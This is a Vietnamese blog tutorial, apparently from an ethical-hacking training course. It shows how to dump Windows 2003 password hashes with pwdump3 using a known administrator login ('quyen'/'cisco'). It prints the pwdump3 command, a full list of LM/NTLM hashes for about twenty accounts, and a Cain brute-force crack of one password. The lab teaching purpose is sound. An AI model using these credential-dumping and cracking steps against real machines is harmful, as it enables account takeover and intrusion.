Trao đổi với tôi

http://www.buidao.com

11/24/09

[Hacking] Phần 5 - System Hacking - Bài 2 - Sử dụng chương trình pwdump3v2 khi có được 1 user administrator của máy nạn nhân để có thể tìm được thông

Máy của nạn nhân sử dụng Window 2003 sp0, và có sẵn user “quyen” password là “cisco”, bây giờ dựa vào account này, ta có thể tìm thêm thông tin của những account khác trong máy.

Trước tiên ta sử dụng pwdump3.exe để xem các tham số cần nhập vào. Sau đó sử dụng lệnh “pwdump3.exe 10.100.100.6 c;\hao2003sp0 quyen”, và nhập vào password của user quyen.

Hình ảnh này đã bị thu nhỏ. Nhấp vào hình để xem kính thước thật (647x330).


Ta mở file hao2003sp0 để xem trong thông tin.


  1. aaa:1015:NO PASSWORD*********************:NO PASSWORD*********************:::

  2. anhhao:1010:DCAF9F8B002C73A0AAD3B435B51404EE:A923FFCC9BE38EBF40A5782BBD9D5E18:::

  3. anhhao1:1011:DCAF9F8B002C73A0AAD3B435B51404EE:A923FFCC9BE38EBF40A5782BBD9D5E18:::

  4. anhhao2:1013:DCAF9F8B002C73A0AAD3B435B51404EE:A923FFCC9BE38EBF40A5782BBD9D5E18:::

  5. anhhaoceh:1019:B26C623F5254C6A311F64391B17C6CDE:98A2C048C77703D54BD0E88887EFD68E:::

  6. ASPNET:1006:7CACBCC121AC203CD8652FE65BEA4486:7D34A6E7504DFAF453D4213660AE7D35:::

  7. Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::

  8. hack:1022:CCF9155E3E7DB453AAD3B435B51404EE:3DBDE697D71690A769204BEB12283678:::

  9. hacker:1018:BCE739534EA4E445AAD3B435B51404EE:5E7599F673DF11D5C5C4D950F5BF0157:::

  10. hao123:1020:58F907D1C79C344DAAD3B435B51404EE:FD03071D41308B58B9DDBC6D5576D78D:::

  11. haoceh:1016:B3FF8763A6B5CE26AAD3B435B51404EE:7AD94985F28454259BF2A03821FEC8DB:::

  12. hicehclass:1023:B2BEF1B1582C2DC0AAD3B435B51404EE:D6198C25F8420A93301A5792398CF94C:::

  13. IUSR_113-SSR3JKXGW3N:1003:449913C1CEC65E2A97074C07DBD2969F:9E6A4AF346F1A1F4833ABFA52ADA9462:::

  14. IWAM_113-SSR3JKXGW3N:1004:4431005ABF401D86F92DBAC26FDFD3B8:188AA6E0737F12D16D60F8B64F7AE1FA:::

  15. lylam:1012:EE94DC327C009996AAD3B435B51404EE:7A63FB0793A85C960A775497C9D738EE:::

  16. quyen:500:A00B9194BEDB81FEAAD3B435B51404EE:5C800F13A3CE86ED2540DD4E7331E9A2:::

  17. SUPPORT_388945a0:1001:NO
    PASSWORD
    *********************:F791B19C488F4260723561D4F484EA09:::

  18. tam:1014:NO PASSWORD*********************:NO PASSWORD*********************:::

  19. test:1017:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537:::

  20. vic123:1021:CCF9155E3E7DB453AAD3B435B51404EE:3DBDE697D71690A769204BEB12283678:::

Ta thấy thông tin user quyen có ID là 500, đây là ID của user administrator trong mạng, và user Guest là 501. Ngoài thông tin trên, ta có thêm thông tin về pash hash của user, bây giờ ta sử dụng chương trình Cain để tìm kiếm thông tin về password của các user khác.



Sử dụng Brute Force Attack với user “hiclassceh” và tìm ra password là “1234a”. Password này chỉ có 5 ký tự và dễ dàng bị Brute Force, tuy nhiên đối với những password là “stong password” (password bao gồm chữ hoa và thường, ký tự, số, ký tự đặc biệt) thì sẽ lâu hơn.

Theo VSIC Education Corporation